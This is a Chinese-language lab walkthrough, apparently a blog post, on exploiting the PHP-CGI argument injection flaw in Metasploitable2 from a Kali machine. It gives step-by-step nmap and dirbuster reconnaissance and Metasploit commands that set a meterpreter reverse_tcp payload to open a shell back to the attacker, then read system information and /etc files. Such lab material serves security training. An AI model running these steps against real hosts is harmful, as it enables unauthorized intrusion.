CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令

环境
kali linux 攻击机:ip 192.168.235.149
metasploitable2 目标机:ip 192.168.235.140

步骤

1、 确保目标机与攻击机能够ping通
Msf溢出phpMyAdmin
2、 对目标主机进行端口扫描,使用nmap -sV -v 192.168.235.140
Msf溢出phpMyAdmin
可以看到Apache服务的端口是开着的
3、 浏览器中输入地址192.168.235.140 访问目标主机
Msf溢出phpMyAdmin
4、 终端中输入dirbuster 启动扫描软件进行扫描
Msf溢出phpMyAdmin
在Target URL中输入目标主机地址:192.168.235.140 点击“Browse”按钮选择字典文件“/usr/share/dirbuster/wordlists/directory-list-1.0.txt”点击star 开始扫描
Msf溢出phpMyAdmin
扫描结果显示
Msf溢出phpMyAdmin
有PHPmyadmin和cgi的目录信息
5、 终端输入msfconsole 打开msf,msf终端中输入search php_cgi 搜索有关CGI php的攻击模块
Msf溢出phpMyAdmin
6、 终端中输入use exploit/multi/http/php_cgi_arg_injection
Show options
Msf溢出phpMyAdmin
7、 Show payload可以看到选项里有 payloads相关的攻击载荷模块
Msf溢出phpMyAdmin
这里我们选择php/meterpreter/reverse_tcp
8、 这里利用meterpreter取得shell连接 set PAYLOAD php/meterpreter/reverse_tcp
Msf溢出phpMyAdmin
9、 show options 查看有什么参数
Msf溢出phpMyAdmin
这里我们设置源主机 LHOST 192.168.235.149 设置目标主机 RHOST 192.168.235.140
Msf溢出phpMyAdmin
输入run开始攻击
Msf溢出phpMyAdmin
拿到meterpreter
10、 终端中输入 sysinfo
Msf溢出phpMyAdmin
可以看到相关的信息
看到etc下的配置文件
Msf溢出phpMyAdmin
可以看到Apache服务器的信息

相关文章:

  • 2021-05-19
  • 2022-02-07
  • 2022-12-23
  • 2021-10-14
  • 2022-01-16
  • 2021-11-21
  • 2021-11-22
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-09-25
  • 2022-01-06
  • 2022-03-07
相关资源
相似解决方案